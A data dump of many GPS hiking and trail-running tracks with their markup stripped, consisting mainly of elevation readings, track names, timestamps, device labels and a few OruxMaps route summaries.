+ + + +1070.80004882812 + + + +1072.80004882812 + + + +1077.0 + + + +1100.0 + + + +1163.80004882812 + + + +1168.40002441406 + + + +1208.40002441406 + + + +1232.80004882812 + + + +1278.40002441406 + + + +1290.19995117188 + + + +1300.80004882812 + + + +1320.40002441406 + + + +1333.19995117188 + + + +1357.59997558594 + + + +1381.40002441406 + + + +1460.40002441406 + +" +" + + + + + + + + + + +812.400024414062 + + + +815.400024414062 + + + +811.200012207031 + + + +809.400024414062 + + + +807.799987792969 + + + +807.799987792969 + + + +807.799987792969 + + + +807.799987792969 + + + +807.799987792969 + + + +807.799987792969 + + + +807.799987792969 + + + +807.799987792969 + + + +813.599975585938 + + + +814.400024414062 + + + +818.200012207031 + + + +822.400024414062 + + + +824.400024414062 + + + +826.599975585938 + + + +830.799987792969 + + + +832.799987792969 + + + +835.0 + + + +841.200012207031 + + + +846.200012207031 + + + +853.799987792969 + + + +855.799987792969 + + + +856.200012207031 + + + +873.200012207031 + + + +906.599975585938 + + + +917.599975585938 + + + +944.400024414062 + + + +948.599975585938 + + + +948.599975585938 + + + +948.599975585938 + + + +952.400024414062 + + + +957.0 + + + +959.0 + + + +963.200012207031 + + + +965.200012207031 + + + +969.200012207031 + + + +981.200012207031 + + + +987.799987792969 + + + +1000.59997558594 + + + +1019.40002441406 + + + +1025.19995117188 + + + +1036.0 + + + +1043.80004882812 + + + +1055.0 + + + +1050.40002441406 + + + +1055.40002441406 + + + +1058.59997558594 + + + +1061.19995117188 + + + +1067.0 + + + +1073.19995117188 + + + +1077.0 + + + +1085.80004882812 + + + +1096.59997558594 + + + +1109.19995117188 + +" +" + + + + + + +Garmin International + + + +Track + + + + + + +893.58 + + + +893.59 + + + +897.9 + + + +906.87 + + + +913.75 + + + +926.51 + + + +936.86 + + + +934.79 + + + +931.39 + + + +929.24 + + + +951.36 + + + +942.64 + + + +942.31 + + + +943.14 + + + +936.85 + + + +939.28 + + + +942.51 + + + +949.03 + +" +" + + +KOMPASS Digital Map Track + + + + + + + +Leobner Mauer + + + + + + +1226.67 + + + +1223.12 + + + +1224.83 + + + +1228.15 + + + +1254.79 + + + +1267.78 + + + +1289.71 + + + +1288.23 + + + +1319.06 + + + +1337.72 + + + +1360.7 + + + +1345.0 + + + +1350.05 + + + +1360.48 + + + +1389.79 + + + +1392.16 + + + +1441.04 + + + +1477.04 + + + +1517.13 + + + +1608.63 + + + +1618.62 + + + +1619.39 + + + +1672.23 + + + +1661.02 + + + +1667.7 + + + +1700.46 + + + +1701.06 + + + +1757.65 + + + +1779.88 + + + +1775.81 + + + +1760.42 + + + +1804.05 + + + +1820.85 + + + +1838.74 + + + +1839.43 + + + +1860.0 + + + +1854.34 + + + +1839.43 + + + +1838.54 + + + +1822.63 + + + +1815.49 + + + +1769.57 + + + +1773.62 + + + +1780.49 + + + +1758.13 + + + +1713.56 + + + +1696.25 + + + +1667.31 + + + +1660.89 + + + +1665.3 + + + +1659.24 + + + +1663.79 + + + +1648.24 + + + +1623.39 + + + +1592.97 + + + +1592.45 + + + +1579.92 + + + +1572.35 + + + +1581.5 + + + +1589.17 + + + +1580.07 + + + +1572.1 + + + +1539.59 + + + +1533.37 + + + +1515.59 + + + +1487.09 + + + +1479.05 + + + +1460.89 + + + +1412.52 + + + +1397.39 + + + +1374.47 + + + +1323.56 + + + +1316.16 + + + +1278.36 + + + +1249.72 + + + +1231.28 + + + +1227.86 + + + +1224.81 + + + +1224.73 + +" +" + + + + + + +Garmin International + + + +2014-11-23 12:02:25 +Escursione autunnale senza neve. +Solo io. + + + + + + +747.51 + + + +737.55 + + + +740.06 + + + +745.27 + + + +749.82 + + + +756.54 + + + +768.13 + + + +771.2 + + + +777.48 + + + +791.79 + + + +799.19 + + + +799.58 + + + +800.23 + + + +806.28 + + + +818.66 + + + +823.05 + + + +831.08 + + + +843.21 + + + +841.62 + + + +863.98 + + + +880.5 + + + +946.45 + + + +1000.54 + + + +1006.55 + + + +1001.66 + + + +981.91 + + + +1016.3 + + + +1001.34 + + + +1005.13 + + + +1003.7 + + + +1016.71 + + + +1021.36 + + + +1003.77 + + + +1048.47 + + + +1059.12 + + + +1086.47 + + + +1091.58 + + + +1082.52 + + + +1073.28 + + + +1052.28 + + + +1043.12 + + + +1034.38 + + + +1029.66 + + + +1021.92 + + + +1011.42 + + + +1003.1 + + + +991.51 + + + +965.27 + + + +883.24 + + + +849.27 + + + +833.93 + + + +816.87 + + + +811.62 + + + +791.0 + + + +779.33 + + + +768.45 + + + +761.01 + + + +757.8 + + + +746.09 + + + +744.66 + + + +741.29 + + + +746.88 + + + +747.6 + + + +743.12 + + + +740.59 + + + +740.1 + +" +" + + + + + + +Garmin International + + +PIANCAVALL 38:58 + + + + + +1061.91 + + + +1142.66 + + + +1145.07 + + + +1150.35 + + + +1159.97 + + + +1170.54 + + + +1172.95 + + + +1178.23 + + + +1193.13 + + + +1205.15 + + + +1221.49 + + + +1226.78 + + + +1235.91 + + + +1240.72 + + + +1243.12 + + + +1248.41 + + + +1258.98 + + + +1299.84 + + + +1311.86 + + + +1324.83 + + + +1332.52 + + + +1337.33 + + + +1341.18 + + + +1345.98 + + + +1353.19 + + + +1371.46 + + + +1374.34 + + + +1374.82 + + + +1376.26 + + + +1376.26 + + + +1399.82 + + + +1407.51 + + + +1426.25 + + + +1431.06 + + + +1434.91 + + + +1442.6 + + + +1468.07 + + + +1482.49 + + + +1498.83 + + + +1507.48 + + + +1517.1 + + + +1534.4 + + + +1538.25 + + + +1521.9 + + + +1543.53 + + + +1563.24 + + + +1578.14 + + + +1598.81 + + + +1659.85 + + + +1648.8 + + + +1634.38 + + + +1626.69 + + + +1628.61 + + + +1626.21 + + + +1618.04 + + + +1643.99 + + + +1619.48 + + + +1549.78 + + + +1492.1 + + + +1466.15 + + + +1427.21 + + + +1390.2 + + + +1373.86 + + + +1362.81 + + + +1349.35 + + + +1344.54 + + + +1323.87 + + + +1320.99 + + + +1316.66 + + + +1280.13 + + + +1243.6 + + + +1234.47 + + + +1217.17 + + + +1205.63 + + + +1191.69 + + + +1184.0 + + + +1182.56 + + + +1171.02 + + + +1161.89 + + + +1143.63 + +" +" + + + + + + + + + + + +426.0 + + + +426.0 + + + +426.0 + + + +426.0 + + + +426.0 + + + +430.0 + + + +433.0 + + + +436.0 + + + +438.0 + + + +437.0 + + + +435.0 + + + +435.0 + + + +434.0 + + + +428.0 + + + +424.0 + + + +428.0 + + + +427.0 + + + +426.0 + + + +426.0 + + + +427.0 + + + +428.0 + +" +" + + + + + + +Garmin International + + +2014-10-08 14:15:02 + + + + + + +2297.93 + + + +2305.57 + + + +2312.68 + + + +2331.06 + + + +2348.82 + + + +2355.67 + + + +2370.15 + + + +2434.94 + + + +2467.43 + + + +2476.58 + + + +2512.42 + + + +2522.13 + + + +2546.73 + + + +2553.65 + + + +2561.84 + + + +2589.72 + + + +2648.71 + + + +2670.44 + + + +2694.36 + + + +2755.35 + + + +2829.5 + + + +2813.08 + + + +2781.86 + + + +2773.57 + + + +2743.42 + + + +2727.76 + + + +2690.01 + + + +2627.03 + + + +2612.53 + + + +2601.42 + + + +2593.47 + + + +2586.59 + + + +2581.51 + + + +2578.33 + + + +2555.74 + + + +2547.12 + + + +2523.76 + + + +2495.87 + + + +2466.38 + + + +2448.88 + + + +2444.47 + + + +2443.84 + + + +2444.38 + + + +2433.82 + + + +2409.81 + + + +2368.57 + + + +2351.65 + + + +2347.53 + + + +2333.04 + + + +2327.76 + + + +2307.32 + + + +2301.07 + + + +2294.37 + +" +" + + + + + + +Garmin International + + + +Traccia corrente: 02 AGO 2015 16:50 + + + + + + + + +1308.49 + + + +1295.99 + + + +1297.44 + + + +1335.41 + + + +1338.77 + + + +1345.5 + + + +1345.02 + + + +1356.56 + + + +1375.78 + + + +1378.19 + + + +1376.75 + + + +1392.13 + + + +1393.57 + + + +1408.47 + + + +1373.86 + + + +1312.82 + + + +1305.13 + + + +1308.49 + + + +1358.0 + + + +1356.08 + + + +1363.77 + + + +1371.94 + + + +1363.77 + + + +1362.81 + + + +1364.73 + + + +1378.19 + + + +1384.92 + + + +1389.24 + + + +1403.66 + + + +1409.43 + + + +1425.29 + + + +1447.88 + + + +1461.34 + + + +1503.16 + + + +1530.56 + + + +1557.95 + + + +1596.89 + + + +1639.67 + + + +1679.56 + + + +1687.73 + + + +1688.69 + + + +1694.46 + + + +1714.17 + + + +1733.39 + + + +1760.31 + + + +1763.2 + + + +1780.02 + + + +1788.19 + + + +1828.08 + + + +1837.7 + + + +1886.72 + + + +1882.4 + + + +1901.14 + + + +1917.01 + + + +1942.48 + + + +1998.72 + + + +2000.16 + + + +2005.45 + + + +2011.7 + + + +2030.44 + + + +2040.54 + + + +2057.84 + + + +2071.3 + + + +2068.41 + + + +2087.16 + +" +" + + + + + + +Garmin International + + +2016-04-30 10:18:03 + + + + + + +796.53 + + + +795.66 + + + +795.89 + + + +795.49 + + + +794.18 + + + +796.03 + + + +805.63 + + + +810.14 + + + +815.36 + + + +822.3 + + + +822.88 + + + +831.56 + + + +851.74 + + + +860.25 + + + +877.16 + + + +903.56 + + + +903.97 + + + +905.45 + + + +906.15 + + + +912.96 + + + +929.58 + + + +942.06 + + + +962.19 + + + +973.07 + + + +977.62 + + + +993.21 + + + +996.96 + + + +1001.14 + + + +1003.27 + + + +1011.33 + + + +1021.07 + + + +1025.27 + + + +1253.54 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +903.0 + + + +905.0 + + + +917.0 + + + +937.0 + + + +944.0 + + + +975.0 + + + +1006.0 + + + +1009.0 + + + +1022.0 + + + +1047.0 + + + +1050.0 + + + +1058.0 + + + +1091.0 + + + +1097.0 + + + +1084.0 + + + +1094.0 + + + +1127.0 + + + +1155.0 + + + +1144.0 + + + +1136.0 + + + +1137.0 + + + +1159.0 + + + +1158.0 + + + +1161.0 + + + +1190.0 + + + +1193.0 + + + +1210.0 + + + +1228.0 + + + +1238.0 + + + +1240.0 + + + +1244.0 + + + +1284.0 + + + +1296.0 + + + +1327.0 + + + +1366.0 + + + +1363.0 + + + +1378.0 + + + +1444.0 + + + +1494.0 + + + +1527.0 + + + +1557.0 + + + +1581.0 + + + +1616.0 + + + +1626.0 + + + +1653.0 + + + +1707.0 + + + +1714.0 + + + +1595.0 + + + +1566.0 + + + +1517.0 + + + +1498.0 + + + +1476.0 + + + +1482.0 + + + +1428.0 + + + +1409.0 + + + +1347.0 + + + +1319.0 + + + +1294.0 + + + +1302.0 + + + +1246.0 + + + +1235.0 + + + +1206.0 + + + +1200.0 + + + +1211.0 + + + +1187.0 + + + +1186.0 + + + +1194.0 + + + +1193.0 + + + +1175.0 + + + +1161.0 + +" +" + + + + + + +Garmin International + + + +07.10.15, 14:00:03 + + + + + + +1068.4000244140625 + + + + + + +1068.5999755859375 + + + + + + +1081.5999755859375 + + + + + + +1087.0 + + + + + + +1090.199951171875 + + + + + + +1105.0 + + + + + + +1110.800048828125 + + + + + + +1116.800048828125 + + + + + + +1122.199951171875 + + + + + + +1129.0 + + + + + + +1134.5999755859375 + + + + + + +1142.4000244140625 + + + + + + +1158.800048828125 + + + + + + +1170.5999755859375 + + + + + + +1189.800048828125 + + + + + + +1227.0 + + + + + + +1234.0 + + + + + + +1267.4000244140625 + + + + + + +1303.5999755859375 + + + + + + +1314.4000244140625 + + + + + + +1322.199951171875 + + + + + + +1338.199951171875 + + + + + + +1350.0 + + + + + + +1356.5999755859375 + + + + + + +1364.199951171875 + + + + + + +1371.4000244140625 + + + + + + +1369.4000244140625 + + + + + + +1366.5999755859375 + + + + + + +1364.800048828125 + + + + + + +1357.4000244140625 + + + + + + +1369.199951171875 + + + + + + +1378.0 + + + + + + +1391.199951171875 + + + + + + +1392.199951171875 + + + + + + +1385.0 + + + + + + +1376.0 + + + + + + +1357.800048828125 + + + + + + +1350.4000244140625 + + + + + + +1346.0 + + + + + + +1325.199951171875 + + + + + " +" + + +Tourenplanung am 7. November 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 7. November 2016 + + + +1204.36459 + + +1214.78278 + + +1230.2255 + + +1237.64696 + + +1240.17802 + + +1275.58264 + + +1297.04646 + + +1313.84676 + + +1329.27552 + + +1350.13497 + + +1364.14695 + + +1387.14739 + + +1394.12419 + + +1416.64367 + + +1423.92242 + + +1443.29222 + + +1456.57622 + + +1463.15341 + + +1463.75358 + + +1465.89958 + + +1465.62732 + + +1471.10228 + + +1494.85086 + + +1517.44553 + + +1535.83912 + + +1542.47326 + + +1539.50739 + + +1556.96686 + + +1564.23667 + + +1583.06819 + + +1591.47857 + + +1610.10828 + + +1610.33172 + + +1626.70001 + + +1641.41581 + + +1719.19128 + + +1712.40624 + + +1709.4172 + + +1740.02139 + + +1748.32913 + + +1757.03634 + + +1775.18182 + + +1785.2161 + + +1803.86796 + + +1830.40062 + + +1846.90585 + + +1868.29841 + + +1871.42091 + + +1885.6176 + + +1943.30125 + + +1968.57261 + + +1971.71536 + + +1961.70555 + + +1975.65621 + + +1991.76978 + + +2000.5434 + + +2002.07228 + + +2007.37516 + + +2022.64264 + + +2033.97951 + + +2047.58328 + + +2062.77895 + + +2074.09415 + + +2093.61566 + + +2099.51138 + + +2105.81257 + + +2119.57224 + + +2132.60845 + + +2118.86563 + + +2162.37126 + + +2209.88382 + + +2209.55001 + + +2264.01609 + + +2315.46692 + + +2358.90867 +" +" + + + + + + +Garmin International + + +02-JAN-13 13:06:00 + + + + + +1169.58 + + + +1171.5 + + + +1181.6 + + + +1188.33 + + + +1211.88 + + + +1224.38 + + + +1238.8 + + + +1249.85 + + + +1271.0 + + + +1281.09 + + + +1322.43 + + + +1349.83 + + + +1354.15 + + + +1396.93 + + + +1439.23 + + + +1464.71 + + + +1536.8 + + + +1553.63 + + + +1561.32 + + + +1571.89 + + + +1580.06 + + + +1591.6 + + + +1598.33 + + + +1604.1 + + + +1631.49 + + + +1660.81 + + + +1674.27 + + + +1694.46 + + + +1706.48 + + + +1713.69 + + + +1708.4 + + + +1693.98 + + + +1691.58 + + + +1689.17 + + + +1664.18 + + + +1649.28 + + + +1637.74 + + + +1613.23 + + + +1591.12 + + + +1586.79 + + + +1588.24 + + + +1577.18 + + + +1558.92 + + + +1556.51 + + + +1552.19 + + + +1532.96 + + + +1466.15 + + + +1450.77 + + + +1437.79 + + + +1417.12 + + + +1417.6 + + + +1393.57 + + + +1347.43 + + + +1316.66 + + + +1306.09 + + + +1285.42 + + + +1263.79 + + + +1245.04 + + + +1230.14 + + + +1220.05 + + + +1199.86 + + + +1178.71 + + + +1166.7 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +montmajou + + + + + +OruxMaps + + + +montmajou +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: montmajou</h2><br /><p>Startzeit: 02/04/2016 10:55</p><p>Zielzeit: 02/04/2016 13:39</p><p>Strecke: 6,4km (02:43)</p><p>Bewegungszeit: 02:05</p><p>Ø-Geschwindigkeit: 2,4km/h</p><p>Netto-Geschwindigkeit: 3,1km/h</p><p>Max. Geschwindigkeit: 8,7km/h</p><p>Minimale Höhe: 1223m</p><p>Maximale Höhe: 2080m</p><p>Steig-Geschw.: 350m/h</p><p>Sink-Geschw.: -177,1m/h</p><p>Aufstieg: 877m</p><p>Abstieg: -28m</p><p>Steigzeit: 02:30</p><p>Sinkzeit: 00:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1231.77 + + + +1242.79 + + + +1235.24 + + + +1232.68 + + + +1223.76 + + + +1228.3 + + + +1223.27 + + + +1249.27 + + + +1271.9 + + + +1290.26 + + + +1291.63 + + + +1301.27 + + + +1307.27 + + + +1321.26 + + + +1332.23 + + + +1341.14 + + + +1366.24 + + + +1376.74 + + + +1366.42 + + + +1400.42 + + + +1436.1 + + + +1439.27 + + + +1451.27 + + + +1476.6 + + + +1485.29 + + + +1488.26 + + + +1501.16 + + + +1518.26 + + + +1536.25 + + + +1544.27 + + + +1545.27 + + + +1557.5 + + + +1578.2 + + + +1605.27 + + + +1624.26 + + + +1642.27 + + + +1663.32 + + + +1672.9 + + + +1662.77 + + + +1674.92 + + + +1687.54 + + + +1677.39 + + + +1702.88 + + + +1724.24 + + + +1747.64 + + + +1766.28 + + + +1795.26 + + + +1820.24 + + + +1858.35 + + + +1871.79 + + + +1919.77 + + + +1937.38 + + + +1927.74 + + + +1936.24 + + + +1950.43 + + + +1948.39 + + + +1944.39 + + + +1942.33 + + + +1980.14 + + + +2007.81 + + + +2029.27 + + + +2038.14 + + + +2073.26 + + + +2080.27 + +" +" + + + + + + +Garmin International + + +2016-10-03 13:16:13-Trail Run + + + + + +1612.75 + + + +1610.83 + + + +1621.88 + + + +1624.77 + + + +1635.82 + + + +1644.95 + + + +1664.66 + + + +1689.17 + + + +1700.23 + + + +1708.4 + + + +1722.34 + + + +1734.36 + + + +1738.2 + + + +1745.41 + + + +1748.29 + + + +1755.99 + + + +1768.0 + + + +1795.4 + + + +1804.53 + + + +1815.11 + + + +1828.08 + + + +1847.31 + + + +1863.17 + + + +1867.98 + + + +1877.59 + + + +1907.39 + + + +1913.16 + + + +1950.17 + + + +1966.03 + + + +1973.72 + + + +1993.91 + + + +1998.24 + + + +2016.5 + + + +2018.91 + + + +2022.75 + + + +2024.67 + + + +2033.33 + + + +2040.05 + + + +2051.11 + + + +2053.99 + + + +2058.8 + + + +2083.31 + + + +2091.49 + + + +2101.1 + + + +2107.83 + + + +2114.56 + + + +2126.57 + + + +2138.59 + + + +2146.76 + + + +2153.97 + + + +2169.35 + + + +2182.33 + + + +2210.21 + + + +2240.97 + + + +2259.24 + + + +2280.38 + + + +2292.4 + + + +2304.42 + + + +2309.22 + + + +2341.43 + + + +2345.27 + + + +2366.42 + + + +2366.9 + + + +2382.76 + + + +2398.63 + + + +2413.05 + + + +2427.95 + + + +2449.58 + + + +2458.71 + + + +2467.84 + + + +2472.17 + + + +2485.15 + + + +2501.01 + + + +2513.5 + + + +2518.79 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +19.07.2015 11:39 + +Andre Bartholdi + + + +Sports Tracker + + + + +3671.0 + + + +3655.0 + + + +3650.0 + + + +3642.0 + + + +3625.0 + + + +3618.0 + + + +3615.0 + + + +3591.0 + + + +3596.0 + + + +3575.0 + + + +3553.0 + + + +3522.0 + + + +3500.0 + + + +3476.0 + + + +3495.0 + + + +3490.0 + + + +3477.0 + + + +3469.0 + + + +3474.0 + + + +3474.0 + + + +3461.0 + + + +3464.0 + + + +3469.0 + + + +3463.0 + + + +3465.0 + +" +" + + +Mourre Fray + + + + + +OruxMaps + + + +Mourre Fray +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Mourre Fray</h2><br /><p>Startzeit: 11/26/2015 10:15</p><p>Zielzeit: 11/26/2015 12:05</p><p>Strecke: 4,3km (01:49)</p><p>Bewegungszeit: 01:16</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,2km/h</p><p>Minimale Höhe: 1189m</p><p>Maximale Höhe: 2024m</p><p>Steig-Geschw.: 474,4m/h</p><p>Sink-Geschw.: -633,8m/h</p><p>Aufstieg: 834m</p><p>Abstieg: -27m</p><p>Steigzeit: 01:45</p><p>Sinkzeit: 00:02</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1218.25 + + + +1189.05 + + + +1190.06 + + + +1203.76 + + + +1208.26 + + + +1219.52 + + + +1226.5 + + + +1244.43 + + + +1243.93 + + + +1255.43 + + + +1271.21 + + + +1272.43 + + + +1290.27 + + + +1293.02 + + + +1296.58 + + + +1319.86 + + + +1316.83 + + + +1322.18 + + + +1317.62 + + + +1356.9 + + + +1386.93 + + + +1418.8 + + + +1427.93 + + + +1429.77 + + + +1447.56 + + + +1466.43 + + + +1465.77 + + + +1474.31 + + + +1513.8 + + + +1522.11 + + + +1530.81 + + + +1612.67 + + + +1637.99 + + + +1659.46 + + + +1728.61 + + + +1767.43 + + + +1818.7 + + + +1845.93 + + + +1848.8 + + + +1849.68 + + + +1877.93 + + + +1908.18 + + + +1924.48 + + + +1947.42 + + + +1958.93 + + + +1956.43 + + + +1965.8 + + + +1968.05 + + + +1980.93 + + + +1996.92 + + + +2000.94 + + + +2014.94 + + + +2023.94 + +" +" + + + + + + +Garmin International + + +2015-04-24 16:39:22 + + + + + + +1022.69 + + + +1023.46 + + + +1021.04 + + + +1019.05 + + + +1016.36 + + + +1035.15 + + + +1040.08 + + + +1038.76 + + + +1052.84 + + + +1059.55 + + + +1067.75 + + + +1080.91 + + + +1108.46 + + + +1131.93 + + + +1138.61 + + + +1147.63 + + + +1160.96 + + + +1172.87 + + + +1185.4 + + + +1220.15 + + + +1289.88 + + + +1328.83 + + + +1378.66 + + + +1484.76 + + + +1541.93 + + + +1577.62 + + + +1602.48 + + + +1651.7 + + + +1661.18 + + + +1632.4 + + + +1624.47 + + + +1577.57 + + + +1579.97 + + + +1510.45 + + + +1487.33 + + + +1424.39 + + + +1402.27 + + + +1320.54 + + + +1217.62 + + + +1187.21 + + + +1182.22 + + + +1169.67 + + + +1155.48 + + + +1139.86 + + + +1115.28 + + + +1088.21 + + + +1076.73 + + + +1068.71 + + + +1063.68 + + + +1057.41 + + + +1052.59 + + + +1048.71 + + + +1049.93 + + + +1026.23 + + + +1028.72 + + + +1029.94 + + + +1032.65 + + + +1031.48 + +" +" + + + + + + +Garmin International + + +2015-03-23 16:55:00 + + + + + + +935.0 + + + +938.24 + + + +944.21 + + + +946.53 + + + +964.03 + + + +974.93 + + + +975.11 + + + +972.27 + + + +972.69 + + + +977.93 + + + +983.46 + + + +1006.14 + + + +1027.99 + + + +1045.87 + + + +1052.42 + + + +1060.83 + + + +1056.82 + + + +1054.86 + + + +1055.48 + + + +1055.34 + + + +1067.82 + + + +1055.34 + + + +1048.79 + + + +1039.28 + + + +1023.18 + + + +1013.88 + + + +1002.41 + + + +993.84 + + + +987.42 + + + +984.9 + + + +978.15 + + + +970.0 + + + +941.28 + + + +933.82 + + + +929.46 + + + +929.83 + + + +909.45 + + + +902.76 + + + +891.51 + + + +872.88 + + + +869.19 + + + +869.04 + + + +881.3 + + + +887.03 + + + +900.8 + + + +922.48 + + + +927.75 + + + +932.63 + + + +938.22 + + + +942.7 + + + +947.41 + + + +951.99 + + + +942.67 + + + +942.84 + +" +" + + + + + + +Garmin International + + + +2014 04 21 Brünnsteinhaus + + + + + + +818.2578125 + + +821.70703125 + + +825.1171875 + + +834.53125 + + +866.0078125 + + +900.44921875 + + +893.3828125 + + +903.98828125 + + +915.33984375 + + +927.01171875 + + +947.32421875 + + +945.6953125 + + +958.796875 + + +993.41015625 + + +1015.6640625 + + +1026.46875 + + +1027.7109375 + + +1030.8828125 + + +1078.42578125 + + +1082.46875 + + +1075.16796875 + + +1094.1875 + + +1100.1484375 + + +1133.66796875 + + +1122.31640625 + + +1141.78515625 + + +1149.47265625 + + +1173.44140625 + + +1168.4140625 + + +1182.25390625 + + +1197.05859375 + + +1214.8515625 + + +1215.234375 + + +1245.8828125 + + +1298.40625 + + +1329.9140625 + + +1331.04296875 + + +1353.66796875 + + +1326.70703125 + + +1361.140625 + + +1336.265625 + + +1325.83984375 + + +1349.5625 + + +1350.69140625 + + +1382.94140625 + + +1348.48828125 + + +1345.00390625 + + +1345.84765625 + + +1332.703125 + + +1324.6484375 + + +1356.015625 + + +1428.5546875 + + +1430.65625 + + +1435.796875 + + +1431.97265625 + + +1399.53515625 + + +1395.63671875 + + +1393.4453125 + + +1369.88671875 + + +1333.4453125 + + +1303.8515625 + + +1272.33984375 + + +1254.5859375 + + +1220.80078125 + + +1224.9609375 + + +1174.94921875 + + +1176.26171875 + + +1133.5078125 + + +1120.359375 + + +1109.64453125 + + +1104.21484375 + + +1091.40234375 + + +1054.96484375 + + +1064.48828125 + + +1018.9140625 + + +998.015625 + + +961.8203125 + + +945.390625 + + +947.01953125 + + +928.16015625 + + +917.1875 + + +901.1484375 + + +891.55859375 + + +902.46484375 + + +865.96484375 + + +832.078125 + + +827.5625 + + +821.57421875 + + +817.9296875 +" +" + + + + + + +Garmin International + + + +23-GEN-15 09:32:55 + + + + + + +502.43 + + + +508.67 + + + +508.19 + + + +517.81 + + + +521.65 + + + +526.94 + + + +520.21 + + + +519.25 + + + +516.85 + + + +513.96 + + + +514.92 + + + +517.33 + + + +521.65 + + + +523.09 + + + +526.94 + + + +525.5 + + + +527.9 + + + +530.79 + + + +532.23 + + + +527.42 + + + +525.5 + + + +526.46 + + + +526.94 + + + +525.02 + + + +529.34 + + + +530.3 + + + +525.98 + + + +521.65 + + + +524.06 + + + +520.21 + + + +518.29 + + + +516.37 + + + +510.6 + + + +509.64 + + + +507.71 + + + +509.64 + +" +" + + + + + + +Garmin International + + +2015-05-29 19:43:43 + + + + + + +1023.2 + + + +1025.21 + + + +1023.04 + + + +1021.54 + + + +1017.95 + + + +1035.72 + + + +1043.32 + + + +1041.83 + + + +1047.24 + + + +1042.15 + + + +1039.63 + + + +1041.3 + + + +1046.49 + + + +1051.61 + + + +1071.12 + + + +1058.85 + + + +1059.85 + + + +1063.49 + + + +1078.86 + + + +1148.0 + + + +1220.16 + + + +1312.47 + + + +1345.21 + + + +1391.54 + + + +1434.1 + + + +1473.47 + + + +1488.47 + + + +1528.98 + + + +1636.51 + + + +1692.2 + + + +1703.15 + + + +1697.29 + + + +1635.64 + + + +1537.69 + + + +1529.01 + + + +1494.95 + + + +1480.12 + + + +1455.75 + + + +1426.16 + + + +1387.39 + + + +1369.22 + + + +1343.28 + + + +1302.27 + + + +1263.11 + + + +1228.23 + + + +1191.45 + + + +1146.95 + + + +1105.71 + + + +1091.27 + + + +1082.0 + + + +1077.72 + + + +1064.27 + + + +1055.31 + + + +1047.27 + + + +1044.67 + + + +1044.26 + + + +1050.77 + + + +1045.94 + + + +1047.26 + + + +1029.85 + + + +1021.58 + + + +1024.9 + + + +1026.36 + + + +1028.12 + + + +1027.39 + + + +1027.47 + +" +" + + + + Lovere - S. Giovanni + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + +837.400024414062 + + + +841.599975585938 + + + +849.799987792969 + + + +854.0 + + + +854.0 + + + +849.200012207031 + + + +847.0 + + + +845.400024414062 + + + +843.400024414062 + + + +843.400024414062 + + + +843.400024414062 + + + +839.200012207031 + + + +839.200012207031 + + + +841.200012207031 + + + +838.0 + + + +837.200012207031 + + + +837.200012207031 + + + +837.200012207031 + + + +832.400024414062 + + + +828.400024414062 + + + +825.200012207031 + + + +824.0 + + + +820.200012207031 + + + +816.200012207031 + + + +812.400024414062 + + + +812.0 + + + +808.200012207031 + + + +801.799987792969 + + + +801.799987792969 + + + +801.799987792969 + + + +803.799987792969 + + + +806.400024414062 + + + +829.599975585938 + + + +835.0 + + + +849.400024414062 + + + +869.0 + + + +886.200012207031 + + + +892.400024414062 + + + +898.599975585938 + + + +904.400024414062 + + + +917.0 + + + +926.400024414062 + + + +938.400024414062 + + + +938.400024414062 + + + +944.0 + + + +954.400024414062 + + + +957.200012207031 + + + +959.400024414062 + + + +964.0 + + + +968.200012207031 + + + +978.200012207031 + + + +987.400024414062 + + + +992.799987792969 + + + +1005.20001220703 + + + +1015.59997558594 + + + +1026.80004882812 + + + +1039.80004882812 + + + +1059.80004882812 + + + +1087.0 + + + +1097.0 + + + +1116.40002441406 + + + +1126.80004882812 + + + +1126.80004882812 + + + +1126.80004882812 + + + +1123.0 + +" +" + + +Unterriederi Suone + + + + + + + + + +812.0 + + +805.6999618287044 + + +802.2000027517199 + + +800.1000080993142 + + +787.0 + + +779.2999940485074 + + +773.8999954985741 + + +766.2000163575763 + + +748.9999350699937 + + +750.9974009492063 + + +741.599870321943 + + +726.3999835749195 + + +707.7000017209044 + + +713.299974634871 + + +722.2 + + +734.8 + + +737.2999786492683 + + +744.6 + + +747.4000162619508 + + +750.3000743081255 + + +754.3 + + +760.4216136064823 + + +764.6 + + +771.4000136793502 + + +776.5999900110428 + + +783.2999642387166 + + +826.4999623791675 + + +848.6999310554835 + + +871.4000555595851 + + +877.7998955512222 + + +894.700166224909 + + +939.9000181938868 + + +970.2997903993781 + + +994.3999415813365 + + +1005.1367830621222 + + +1026.5999681414314 + + +1039.3001153856067 + + +1051.8862841296327 + + +1061.9721476875948 + + +1065.7 + + +1064.6999547056373 + + +1063.5000293379226 + + +1066.8999797107351 + + +1070.0 + + +1073.9999873876695 + + +1071.2999239355515 + + +1054.099998518887 + + +1056.3000158204122 + + +1064.2157838619346 + + +1069.9000021144118 + + +1074.4999753349905 + + +1078.99997455609 + + +1087.0000185500937 + + +1094.5999789975447 + + +1102.7999958241112 + + +1102.0 + + +1102.3033745822945 + + +1098.899953153284 + + +1076.600023596457 + + +1073.6 + + +1072.5000037937007 + + +1072.8000168290948 + + +1073.700000775371 + + +1073.5 + + +1073.4 + + +1074.699990673333 + + +1074.6000008043936 + + +1079.3649046457926 + + +1073.8000949114025 + + +1042.8 + + +1012.0859602027043 + + +1007.7648542576775 + + +1000.5001073670418 + + +995.5 + + +990.6 + + +968.1 + + +996.2997118230159 + + +998.8000101437527 + + +1008.3 + + +1004.8 +" +" + + + + +2016-07-02 08:32 + + +1253.0 + + +1283.0 + + +1292.0 + + +1302.0 + + +1312.0 + + +1319.0 + + +1312.0 + + +1335.0 + + +1360.0 + + 